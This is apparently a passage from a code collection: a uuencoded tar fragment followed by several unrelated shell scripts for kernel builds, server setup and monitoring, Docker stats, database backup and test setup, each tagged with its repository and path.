M:6YP=70*9G)O;2!T:&4@<W1A;F1A<F0@:6YP=70N"@I/=71P=70@;&EN97,@
M87)E(&YO<FUA;&QY('-O<G1E9"!O;B!A(&-H87)A8W1E<BUB>2UC:&%R86-T
M97(@8F%S:7,L"F9R;VT@;&5F="!T;R!R:6=H="!W:71H:6X@82!L:6YE+B`@
M5&AE(&1E9F%U;'0@8V]L;&%T:6YG('-E<75E;F-E(&ES"G1H92!!4T-)22!C
M:&%R86-T97(@<V5T+B`@3&EN97,@8V%N(&%L<V\@8F4@<V]R=&5D(&%C8V]R
M9&EN9R!T;R!T:&4*8V]N=&5N=',@;V8@;VYE(&]R(&UO<F4@9FEE;&1S('-P
M96-I9FEE9"!B>2!A('-O<G0M9FEE;&0L"G-P96-I9FEC871I;VXL('5S:6YG
M('1H92`K<W<@*'-T87)T:6YG+7=O<F0I+"`M97<@*&5N9"UA="UW;W)D*2P@
M86YD"G1H92`M=&,@*'-E="U404(M8VAA<F%C=&5R+W=O<F0@9&5L:6UI=&5R
M*2!O<'1I;VYS+"!A<R`@9&5S8W)I8F5D"G5N9&5R($]05$E/3E,@8F5L;W<N
M("!7:&5N(&YO('=O<F0@9&5L:6UI=&5R(&ES('-P96-I9FEE9"P@;VYE(&]R
M(&UO<F4*861J86-E;G0@=VAI=&4M<W!A8V4@8VAA<F%C=&5R<R`H4U!!0T4@
M86YD(%1!0BD@<VEG;FEF>2!T:&4@96YD(&]F('1H90IP<F5V:6]U<R!W;W)D
M.R!T:&4@;&EN97,Z"@I9;W4@8V%N(&%P<&QY(&$@8VAA<F%C=&5R(&]F9G-E
M="!T;R!S=R!A;F0@97<@=&\@:6YD:6-A=&4@=&AA="!A(&9I96QD"FES('1O
M('-T87)T(&]R(&5N9"!A(&=I=F5N(&YU;6)E<B!O9B!C:&%R86-T97)S('=I
M=&AI;B!A('=O<F0L('5S:6YG"G1H92!N;W1A=&EO;CH@8'<N8R<N("!!('-T
M87)T:6YG('!O<VET:6]N('-P96-I9FEE9"!I;B!T:&4@9F]R;3H@8"MW+F,G
M"FEN9&EC871E<R!T:&4@8VAA<F%C=&5R(&EN('!O<VET:6]N(&,@*&)E9VEN
M;FEN9R!W:71H(#`@9F]R('1H92!F:7)S=`IC:&%R86-T97(I+"!W:71H:6X@
M=V]R9"!W("@Q(&%N9"`Q+C`@87)E(&5Q=6EV86QE;G0I+B`@06X@96YD:6YG
M"G!O<VET:6]N('-P96-I9FEE9"!I;B!T:&4@9F]R;3H@(&`M=RYC)R!I;F1I
M8V%T97,@=&AA="!T:&4@9FEE;&0@96YD<PIA="!T:&4@8VAA<F%C=&5R(&IU
M<W0@<')I;W(@=&\@<&]S:71I;VX@8R`H8F5G:6YN:6YG('=I=&@@,"!F;W(@
M=&AE"F1E;&EM:71E<B!J=7-T('!R:6]R('1O('1H92!F:7)S="!C:&%R86-T
M97(I+"!W:71H:6X@=V]R9"!W+B`@268@=&AE("UB"F9L86<@:7,@:6X@969F
M96-T+"!C(&ES(&-O=6YT960@9G)O;2!T:&4@9FER<W0@;F]N+7=H:71E+7-P
M86-E(&]R"FYO;BUD96QI;6ET97(@8VAA<F%C=&5R(&EN('1H92!F:65L9"P@
M;W1H97)W:7-E+"!D96QI;6ET97(@8VAA<F%C=&5R<PIA<F4@8V]U;G1E9"X*
M"E1H92!A;6]U;G0@;V8@;6%I;B!M96UO<GD@=7-E9"!B>2!T:&4@<V]R="!H
M87,@82!L87)G92!I;7!A8W0@;VX@:71S"G!E<F9O<FUA;F-E+B`@4V]R=&EN
M9R!A('-M86QL(&9I;&4@:6X@82!L87)G92!A;6]U;G0@;V8@;65M;W)Y(&ES
M(&$*=V%S=&4N("!)9B!T:&ES(&]P=&EO;B!I<R!O;6ET=&5D+"!S;W)T(&)E
M9VEN<R!U<VEN9R!A('-Y<W1E;2!D969A=6QT"FUE;6]R>2!S:7IE+"!A;F0@
M8V]N=&EN=65S('1O(&%D9"!S<&%C92!A<R!N965D960N("`@268@=&AI<R!O
M<'1I;VX@:7,*9VEV96X@<V]R="!S=&%R=',@=VET:"!K;65M+"!K:6QO8GET
M97,@;V8@;65M;W)Y+"!I9B!A;&QO=V5D+"!O<B!A<PIC;&]S92!T;R!T:&%T
M(&%M;W5N="!A<R!P;W-S:6)L92X@("!3=7!P;'EI;F<@+7DP(&=U87)A;G1E
M97,@=&AA="!S;W)T"G-T87)T<R!W:71H(&$@;6EN:6UU;2!O9B!M96UO<GDN
M("!">2!C;VYV96YT:6]N+"`M>2`H=VET:"!N;R!A<F=U;65N="D*<W1A<G1S
M('=I=&@@;6%X:6UU;2!M96UO<GDN"@``````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````!L86(O8F5E<G,`````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````,#$P
M,#8T-``P,#(Q-C4S`#`P,#<P,#<`,#`P,#`P,#`R-C$`,#4T,#(Q-C$W-C$`
M,#`Q,C8P-P`P````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````'5S=&%R`#`P979A9```````````````````
M``````````````````!C8S,U.3$`````````````````````````````````
M`#`P,#`S-3,`,#`P,#8Q-P``````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````$)A<W,@0F5S="!":71T97(*"E1E=&QE>7,@0FET=&5R"E=O<G1H:6YG
M=&]N(#0P<R!"97-T"E1I;6UY(%1A>6QO<G,@3&%N9&QO<F0*1F%R="!"96QL
M:65S(%)U:6X*5&%N9VQE9F]O=`I/;&0@4&5C=6QI87(*0V%S=&QE($5D96X*
M1F]S=&5R<R!86%A8"DQI;VX@0G)E=PH*4F]B8FEE<PHT,"!3:&EL;&EN9W,*
M"@``````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````;&%B+V=E;@``````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````#`Q,#`W-34`,#`R,38U
M,P`P,#`W,#`W`#`P,#`P,#`P,#4U`#`U-#`R,34V-#(V`#`P,3(R-C8`,```
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````!U<W1A<@`P,&5V860`````````````````````````````````
M````8V,S-3DQ```````````````````````````````````P,#`P,S4S`#`P
M,#`V,3<`````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````````````````````````````C(2]B:6XO
M<V@*"G=H:6QE('1R=64*9&\*"61A=&4*"7-L965P(#$*9&]N90H`````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````&QA8B]P=6)S````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````P,3`P-C0T`#`P,C$V-3,`,#`P-S`P-P`P
M,#`P,#`P,#(S-0`P-30P,C$U-S4R-@`P,#$R-#8U`#``````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````=7-T
M87(`,#!E=F%D`````````````````````````````````````&-C,S4Y,0``
M````````````````````````````````,#`P,#,U,P`P,#`P-C$W````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````5&AE(%=H:71E($QI;VX*5&AE
M($MI;F<@86YD(%%U965N"E1H92!,:6]N97-S"E1H92!&:7)S="!A;F0@3&%S
M=`I4:&4@1F]X(&%N9"!.97=T"E1H92!3=&%T:6]N($%R;7,*3F5W($EN;@I4
M:&4@56YI='D@5&%V97)N"DAE;G)Y)W,@5VEN92!"87(@"E1H92!+:6YG<R!(
M96%D"@``````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````````````````!L
M86(O<W1O<GDQ````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````,#$P,#8T-``P,#(Q-C4S`#`P,#<P,#<`,#`P,#`P,#`P-3(`
M,#4T,#(Q-C,Q,#``,#`Q,C<S,P`P````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````'5S=&%R`#`P979A9```
M``````````````````````````````````!C8S,U.3$`````````````````
M`````````````````#`P,#`S-3,`,#`P,#8Q-P``````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````$]N8V4@=7!O;B!A('1I;64@&'1H97)E('=E<F4@
M=&AR964@!6)E87)S"@``````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````;&%B+W5S97)L:7-T
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````````````````````#`Q
M,#`V-#0`,#`R,38U,P`P,#`W,#`W`#`P,#`P,#`P-3<W`#`U-#`R,38R-#4S
M`#`P,3,S-S(`,```````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````!U<W1A<@`P,&5V860`````````````````
M````````````````````8V,S-3DQ````````````````````````````````
M```P,#`P,S4S`#`P,#`V,3<`````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````!D<&T@("`@("!C;VYS;VQE($UA>2`S,"`Q,SHP-`IU<V5R-"`@("!T
M='EP,"`@($UA>2`R-R`Q,CHU.0DH8W-G:20U,RD*9'!M("`@("`@='1Y<#$@
M("!-87D@,S`@,3,Z,#4)*#HP+C`I"F1P;2`@("`@('1T>7`R("`@36%Y(#,P
M(#$T.C`Y"2@Z,"XP*0ID<&T@("`@("!T='EP,R`@($UA>2`S,"`Q-3HU.0DH
M.C`N,"D*=7-E<C0@("`@='1Y<#0@("!-87D@,C<@,3,Z,38)*&-S9VDD-34I
M"G5S97(T("`@('1T>7!B("`@36%Y(#(W(#$R.C0R"2AC<V=I)#4W*0IG96]R
M9V4Q("!T='EA"2!-87D@."`@,34Z,3@)"F1U<"`@("`@('1T>6(@("`@36%Y
M(#$U(#$U.C4Y"0ID=7`@("`@("!T='EB("`@($UA>2`Q-2`Q-3HU.0D*9'5P
M("`@("`@='1Y8B`@("!-87D@,34@,34Z-3D)"@``````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````&QA8B]D=7!L:7-T````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````````````````````P,3`P-C8T`#`P,C$V
M-3,`,#`P-S`P-P`P,#`P,#`P,#$S-0`P-C$R,34W,3$W-P`P,#$S,C`R`#``
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````=7-T87(`,#!E=F%D````````````````````````````````
M`````&-C,S4Y,0``````````````````````````````````,#`P,#,U,P`P
M,#`P-C$W````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````9'5P("`@
M("`@='1Y8B`@("!-87D@,34@,34Z-3D)"F1U<"`@("`@('1T>6(@("`@36%Y
M(#$U(#$U.C4Y"0ID=7`@("`@("!T='EB("`@($UA>2`Q-2`Q-3HU.0D*````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
`
end
|
stevshil/vagrant
|
neueda/bin/neueda-linux.sh
|
Shell
|
gpl-2.0
| 32,688 |
#!/usr/bin/env bash
export LANG=C
export LC_ALL=C
[ -n "$TOPDIR" ] && cd $TOPDIR
try_version() {
[ -f version ] || return 1
REV="$(cat version)"
[ -n "$REV" ]
}
try_svn() {
[ -d .svn ] || return 1
REV="$(svn info | awk '/^Last Changed Rev:/ { print $4 }')"
REV="${REV:+r$REV}"
[ -n "$REV" ]
}
try_git() {
[ -d .git ] || return 1
REV="$(git log -1 --oneline | awk '{ print $1 }')"
[ -n "$REV" ]
}
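# (Note, not a change: `git rev-parse --short HEAD` would give the same
# abbreviated commit hash without parsing `git log` output.)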
try_hg() {
[ -d .hg ] || return 1
REV="$(hg log -r-1 --template '{desc}' | awk '{print $2}' | sed 's/\].*//')"
REV="${REV:+$REV}"
[ -n "$REV" ]
}
try_version || try_svn || try_git || try_hg || REV="unknown"
echo "$REV"
|
nikwrt/openwrt
|
scripts/getver.sh
|
Shell
|
gpl-2.0
| 634 |
#!/usr/bin/env bash
VERSION=1
function dockerStatsFormat() {
cat <<EOF
{
"container": "{{.Name}}",
"pids": {{.PIDs}},
"memory": {
"used": "{{ index (split .MemUsage " / ") 0 }}",
"limit": "{{ index (split .MemUsage " / ") 1 }}",
"perc": "{{.MemPerc}}"
},
"cpu": "{{.CPUPerc}}"
}
EOF
}
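# Illustrative output for a single container (values invented for the example):
# {
#   "container": "web",
#   "pids": 4,
#   "memory": { "used": "21.5MiB", "limit": "1.944GiB", "perc": "1.08%" },
#   "cpu": "0.15%"
# }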
function getStats() {
docker stats \
--no-stream \
--format "$(dockerStatsFormat)"
}
STATS=$(getStats 2>&1)
ERROR=$?
if [ $ERROR -ne 0 ];then
ERROR_STRING=${STATS}
unset STATS
fi
jq -nMc \
--slurpfile stats <(echo "${STATS:-}") \
--arg version "${VERSION:-1}" \
--arg error "${ERROR:-0}" \
--arg errorString "${ERROR_STRING:-}" \
'{"version": $version, "data": $stats, "error": $error, "errorString": $errorString }'
# vim: tabstop=2:shiftwidth=2:expandtab:
|
VVelox/librenms-agent
|
snmp/docker-stats.sh
|
Shell
|
gpl-2.0
| 795 |
#!/bin/bash
# Bash Color
green='\033[01;32m'
red='\033[01;31m'
blink_red='\033[05;31m'
restore='\033[0m'
clear
# Resources
THREAD="-j$(grep -c ^processor /proc/cpuinfo)"
KERNEL="zImage"
DTBIMAGE="dtb"
DEFCONFIG="ak_bacon_defconfig"
KERNEL_DIR=$(pwd)
RESOURCE_DIR="$KERNEL_DIR/.."
# Kernel Details
BASE_AK_VER="AK"
VER=".306.OPO.CM12.1"
AK_VER="$BASE_AK_VER$VER"
# Vars
export LOCALVERSION="~${AK_VER}"
export CROSS_COMPILE="$RESOURCE_DIR/AK-uber-5.2/bin/arm-eabi-"
export ARCH=arm
export SUBARCH=arm
export KBUILD_BUILD_USER=ak
export KBUILD_BUILD_HOST=kernel
# Paths
REPACK_DIR="$RESOURCE_DIR/AK-OnePone-AnyKernel2"
PATCH_DIR="$RESOURCE_DIR/AK-OnePone-AnyKernel2/patch"
MODULES_DIR="$RESOURCE_DIR/AK-OnePone-AnyKernel2/modules"
ZIP_MOVE="$RESOURCE_DIR/AK-releases"
ZIMAGE_DIR="$KERNEL_DIR/arch/arm/boot"
# Functions
function clean_all {
rm -rf $MODULES_DIR/*
cd $REPACK_DIR
rm -rf $KERNEL
rm -rf $DTBIMAGE
git reset --hard > /dev/null 2>&1
git clean -f -d > /dev/null 2>&1
cd $KERNEL_DIR
echo
make clean && make mrproper
}
function make_kernel {
echo
make $DEFCONFIG
make $THREAD
cp -vr $ZIMAGE_DIR/$KERNEL $REPACK_DIR
}
function make_modules {
rm "$MODULES_DIR"/*
find $KERNEL_DIR -name '*.ko' -exec cp -v {} $MODULES_DIR \;
}
function make_dtb {
$REPACK_DIR/tools/dtbToolCM -2 -o $REPACK_DIR/$DTBIMAGE -s 2048 -p scripts/dtc/ arch/arm/boot/
}
function make_zip {
cd $REPACK_DIR
zip -r9 "${AK_VER}".zip *
mv "${AK_VER}".zip $ZIP_MOVE
cd $KERNEL_DIR
}
DATE_START=$(date +"%s")
echo -e "${green}"
echo "AK Kernel Creation Script:"
echo " _____ "
echo " (, / | /) , "
echo " /---| __ _ __ (/_ __ "
echo " ) / |_/ (_(_(_/ (_/(___(_(_(_"
echo " ( / "
echo " _/ "
echo
echo "---------------"
echo "Kernel Version:"
echo "---------------"
echo -e "${red}"; echo -e "${blink_red}"; echo "$AK_VER"; echo -e "${restore}";
echo -e "${green}"
echo "-----------------"
echo "Making AK Kernel:"
echo "-----------------"
echo -e "${restore}"
while read -p "Do you want to clean stuffs (y/n)? " cchoice
do
case "$cchoice" in
y|Y )
clean_all
echo
echo "All Cleaned now."
break
;;
n|N )
break
;;
* )
echo
echo "Invalid try again!"
echo
;;
esac
done
echo
while read -p "Do you want to build kernel (y/n)? " dchoice
do
case "$dchoice" in
y|Y)
make_kernel
make_dtb
make_modules
make_zip
break
;;
n|N )
break
;;
* )
echo
echo "Invalid try again!"
echo
;;
esac
done
echo -e "${green}"
echo "-------------------"
echo "Build Completed in:"
echo "-------------------"
echo -e "${restore}"
DATE_END=$(date +"%s")
DIFF=$(($DATE_END - $DATE_START))
echo "Time: $(($DIFF / 60)) minute(s) and $(($DIFF % 60)) seconds."
echo
|
jejecule/kernel_despair_find7
|
ak-bacon-build.sh
|
Shell
|
gpl-2.0
| 2,850 |
#!/bin/ash
# link listed plugins
PACKAGES_DIR=/home/node/xen-orchestra/packages
# official plugins directories
PLUGINS="xo-server-auth-github \
xo-server-auth-google \
xo-server-auth-ldap \
xo-server-auth-saml \
xo-server-backup-reports \
xo-server-load-balancer \
xo-server-netbox \
xo-server-perf-alert \
xo-server-sdn-controller \
xo-server-transport-email \
xo-server-transport-icinga2 \
xo-server-transport-nagios \
xo-server-transport-slack \
xo-server-transport-xmpp \
xo-server-usage-report \
xo-server-web-hooks"
# NB: this list is manually updated, feel free to make a pull request if new
# plugins are added/removed.
cd ${PACKAGES_DIR}/xo-server/node_modules
for elem in ${PLUGINS}; do
ln -s ${PACKAGES_DIR}/$elem $elem
done;
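# (Hedged note: `ln -s` fails when a link already exists, so re-running this
# script errors once per plugin; `ln -sfn ${PACKAGES_DIR}/$elem $elem` would
# make the linking idempotent.)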
|
Ezka77/xen-orchestra-ce
|
alpine/link_plugins.sh
|
Shell
|
gpl-3.0
| 747 |
#!/bin/sh
basedir=/root/server_manager/package/sys_initialization
install_tmp=/root/Tmp
mkdir -p /root/Tmp
cd $basedir
rpm -ivh lrzsz-0.12.20-22.1.x86_64.rpm
rpm -ivh ntp-4.2.2p1-9.el5.centos.2.x86_64.rpm
ntpdate 192.168.111.17
#unzip linux-1.9.20b_1.50.13.zip
#cd Server/Linux/Driver/
#tar zxf netxtreme2-5.0.17.tar.gz
#cd netxtreme2-5.0.17
#make && make install
#cd /root/soft
cd $basedir
tar zxf sysstat-9.0.2.tar.gz -C $install_tmp
cd $install_tmp/sysstat-9.0.2
./configure
make && make install
cd $basedir
rpm -ivh lm_sensors-2.10.7-4.el5.x86_64.rpm lm_sensors-devel-2.10.7-4.el5.x86_64.rpm net-snmp-libs-5.3.2.2-7.el5.x86_64.rpm net-snmp-5.3.2.2-7.el5.x86_64.rpm
\cp snmpd.conf /etc/snmp/
service snmpd start
chkconfig snmpd on
chkconfig --list |grep snmpd
cd $basedir
#rpm -ivh openssl-devel-0.9.8e-22.el5_8.1.x86_64.rpm openssl-0.9.8e-22.el5_8.1.x86_64.rpm
tar xf nagiosinstall.tar.gz -C $install_tmp
cd $install_tmp/nagiosinstall
chmod 755 install.sh
chmod 755 check_traffic.sh
./install.sh
sed -i 's/127.0.0.1/127.0.0.1,192.168.219.47/g' /usr/local/nagios/etc/nrpe.cfg
killall -9 nrpe
/usr/local/nagios/bin/nrpe -c /usr/local/nagios/etc/nrpe.cfg -d
#close prot:22 open port:5044
#sed -i 's/#Port 22/Port 5044/;s/#PermitRootLogin yes/PermitRootLogin no/;s/#UseDNS yes/UseDNS no/g' /etc/ssh/sshd_config
#service sshd restart
# service
#
#route add -net 192.168.8.0 netmask 255.255.255.0 gw 192.168.219.254
########
#crontab -e
#30 5 * * * cd /usr/sbin;./ntpdate 192.168.219.58>/dev/null
#*/1 * * * * /usr/local/lib/sa/sa1 -S DISK 10 6 &
#modprobe ip_tables
#modprobe iptable_filter
#modprobe ip_conntrack hashsize=131072
#modprobe ip_conntrack_ftp
#modprobe ipt_state
#modprobe iptable_nat
#modprobe ip_nat_ftp
#modprobe ipt_MASQUERADE
#modprobe ipt_LOG
#modprobe ipt_REJECT
#echo 1048576 > /proc/sys/net/core/somaxconn
#echo 1048576 > /proc/sys/net/ipv4/ip_conntrack_max
#echo "1024 64000" > /proc/sys/net/ipv4/ip_local_port_range
#echo 131072 > /proc/sys/fs/file-max
#echo 1 > /proc/sys/net/ipv4/tcp_tw_reuse
#echo 1 > /proc/sys/net/ipv4/tcp_tw_recycle
#echo 262144 > /proc/sys/net/ipv4/tcp_max_orphans
#echo 262144 > /proc/sys/net/ipv4/tcp_max_syn_backlog
#echo 3 > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_time_wait
#echo 30 > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_syn_recv
#echo 524288 > /proc/sys/net/ipv4/tcp_max_tw_buckets
#echo 5 > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_close_wait
#echo 18000 > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_established
#echo 1 > /proc/sys/net/ipv4/tcp_syn_retries
#echo 3 > /proc/sys/net/ipv4/tcp_synack_retries
#echo 1 > /proc/sys/net/ipv4/tcp_syncookies
#echo 0 > /proc/sys/net/ipv4/tcp_retrans_collapse
#echo 0 >/proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_loose
#echo 262144 > /proc/sys/net/core/wmem_max
#echo 65536 > /proc/sys/net/core/wmem_default
#echo 262144 > /proc/sys/net/core/rmem_max
#echo 65536 > /proc/sys/net/core/rmem_default
#echo "8096 65536 262144" >/proc/sys/net/ipv4/tcp_wmem
#echo "8096 65536 262144" >/proc/sys/net/ipv4/tcp_rmem
#route add -net 192.168.8.0 netmask 255.255.255.0 gw 192.168.219.254
#echo "*.* @192.168.219.110" >> /etc/syslog.conf
#service syslog restart
|
sunbenxin/python-script
|
monitor_scripts/server_manager/server_manager/puppet/all_sh/sys_initialization.sh
|
Shell
|
gpl-3.0
| 3,272 |
#!/bin/bash -l
#run the ffs calculation many times.
rm -f ffs_bench.dat
for i in `seq 1 1`
do
python ../../server/main_server.py -c ffs_particle_server.conf >c 2>&1 &
sleep 1
python main_particle.py
grep -A 1 "# k_AB" c | tail -n 1 >> ffs_bench.dat
done
mean=$(awk -F : '{t+=$NF;c++}END{print t/c}' ffs_bench.dat)
stde=$(awk -F : -v m="$mean" '{t+=($NF-m)*($NF-m);c++}END{print sqrt(t)/c}' ffs_bench.dat)
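# (Aside: sqrt(t)/c is a rough spread estimate; the textbook standard error of
# the mean would be sqrt(t/(c-1))/sqrt(c).)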
count=$(wc -l ffs_bench.dat | awk '{print $1}')
echo "Rate from PERM is: $mean p/m $stde over $count runs"
|
freshs/freshs
|
test/test_ffs_particle/ffs_bench.bash
|
Shell
|
gpl-3.0
| 518 |
#!/bin/bash
# Copyright (C) 2018 Pablo Iranzo Gómez <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# long_name: returns the role of the system (master, node, etc)
# description: This plugin is used in various functions. It's just a metadata plugin.
# priority: 0
# Load common functions
[ -f "${CITELLUS_BASE}/common-functions.sh" ] && . "${CITELLUS_BASE}/common-functions.sh"
ROLE="$(get_ocp_node_type)"
if [[ ${ROLE} == "unknown" ]]; then
echo "Couldn't determine OCP role" >&2
exit ${RC_SKIPPED}
fi
echo "ocp-role"
echo ${ROLE} >&2
exit ${RC_OKAY}
|
zerodayz/citellus
|
citellusclient/plugins/metadata/openshift/system-role.sh
|
Shell
|
gpl-3.0
| 1,177 |
#!/bin/bash
cd /tmp
git clone git://git.cryptomilk.org/projects/cmocka.git
cd cmocka
git checkout tags/cmocka-1.0.1 -b 1.0.1
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug ..
make
sudo make install
|
staskobzar/libamip
|
.travis-install-cmocka.sh
|
Shell
|
gpl-3.0
| 232 |
#!/usr/bin/env bash
COMPOSER_ARGS="--no-interaction"
if [[ $BZION_HHVM -eq 1 ]]; then
COMPOSER_ARGS="-v"
fi
php composer.phar install $COMPOSER_ARGS --prefer-source --ignore-platform-reqs
FILE=app/config.yml
cp app/config.example.yml $FILE
sed -i 's/username: bzion_admin/username: root/' $FILE
sed -i 's/password: password/password: /' $FILE
sed -i 's/development:\s*false/development: force/' $FILE
cat << EOF >> $FILE
testing:
host: localhost
database: bzion
username: root
password:
EOF
echo "error_reporting (E_ALL | E_STRICT | E_DEPRECATED);" >> bzion-load.php
mysql -e "CREATE DATABASE IF NOT EXISTS bzion;" -uroot;
php composer.phar migrate-database
|
kongr45gpen/bzion
|
tests/initialize.sh
|
Shell
|
gpl-3.0
| 703 |
#!/bin/bash
source /usr/bin/functions
_help() {
echo "How to use backup-mysql-db:"
echo "Available params:"
echo "-d|--database - Database name"
echo "-u|--user - User/Database owner"
echo "-p|--password - User/Database owner password"
echo
exit 0
}
test $# -gt 0 || _help
while true; do
if [ "$1" == "-y" ] ; then
pYes=1
elif processShortParam "-d" "$1" "$2"; then
pDatabase="${cRes}"; shift
elif processLongParam "--database" "$1"; then
pDatabase="${cRes}"
elif processShortParam "-u" "$1" "$2"; then
pUser="${cRes}"; shift
elif processLongParam "--user" "$1"; then
pUser="${cRes}"
elif processShortParam "-p" "$1" "$2"; then
pPassword="${cRes}"; shift
elif processLongParam "--password" "$1"; then
pPassword="${cRes}"
elif [ -z "$1" ]; then
break
else
_help
fi
shift
done
checkParam "${pDatabase}" '$pDatabase'
checkParam "${pUser}" '$pUser'
checkParam "${pPassword}" '$pPassword'
if [ "${pYes}" != "1" ]; then
confirmation "Backup MySQL database '${pDatabase}'?" || exit 1
fi
CURRENT_DATE=$(date +%Y-%m-%d)
cd /var/backups/"${pUser}"
mysqldump -u "${pUser}" -p"${pPassword}" -f "${pDatabase}" | gzip > "./${pDatabase}_${CURRENT_DATE}.sql.gz"
# mysql ${pDatabase} -u${pUser} -p${pPassword} < ./path/to/dump.sql
|
corpsee/phpell
|
scripts/utils/backup-mysql-db.sh
|
Shell
|
gpl-3.0
| 1,401 |
#!/bin/sh
for secret in s3_url zimfarm_username zimfarm_password
do
if [ -f /run/secrets/$secret ]
then
varname=$(echo $secret | tr a-z A-Z)
echo "[entrypoint] exposing ${secret} secret as ${varname}"
export "${varname}=$(cat /run/secrets/$secret)"
fi
done
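# Example: a file /run/secrets/zimfarm_username is exposed to the exec'd
# process as ZIMFARM_USERNAME, holding the file's contents.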
exec "$@"
|
openzim/zimfarm
|
watcher/entrypoint.sh
|
Shell
|
gpl-3.0
| 302 |
echo "*** install desktop environment ***"
pacman -Sy --noconfirm --needed xorg-xdm xdm-archlinux xorg-server xorg-xinit xorg-utils xorg-server-utils
pacman -Sy --noconfirm --needed xf86-video-vesa
pacman -Sy --noconfirm --needed lxde openbox
#pacman -Sy --noconfirm --needed xfce4 xfce4-goodies human-icon-theme
#pacman -Sy --noconfirm --needed networkmanager gnome-keyring network-manager-applet nm-connection-editor
#systemctl enable lxdm.service
#systemctl enable xdm-archlinux
systemctl enable lxdm
|
bboortz/archlinux-scripts
|
build_os/post_scripts/210_desktop_install.sh
|
Shell
|
gpl-3.0
| 509 |
#!/bin/bash
rm "InfluenceContaminations/results.txt"
cp "EventSelection/Cuts_perso_aucun.h" "EventSelection/Cuts.h"
# no bkg
rm "contaminations/contaminations.h"
echo "double A_208Tl = 0 ; double A_214Bi = 0 ; double A_222Rn = 0 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",1\)
# nominal bkg
rm "contaminations/contaminations.h"
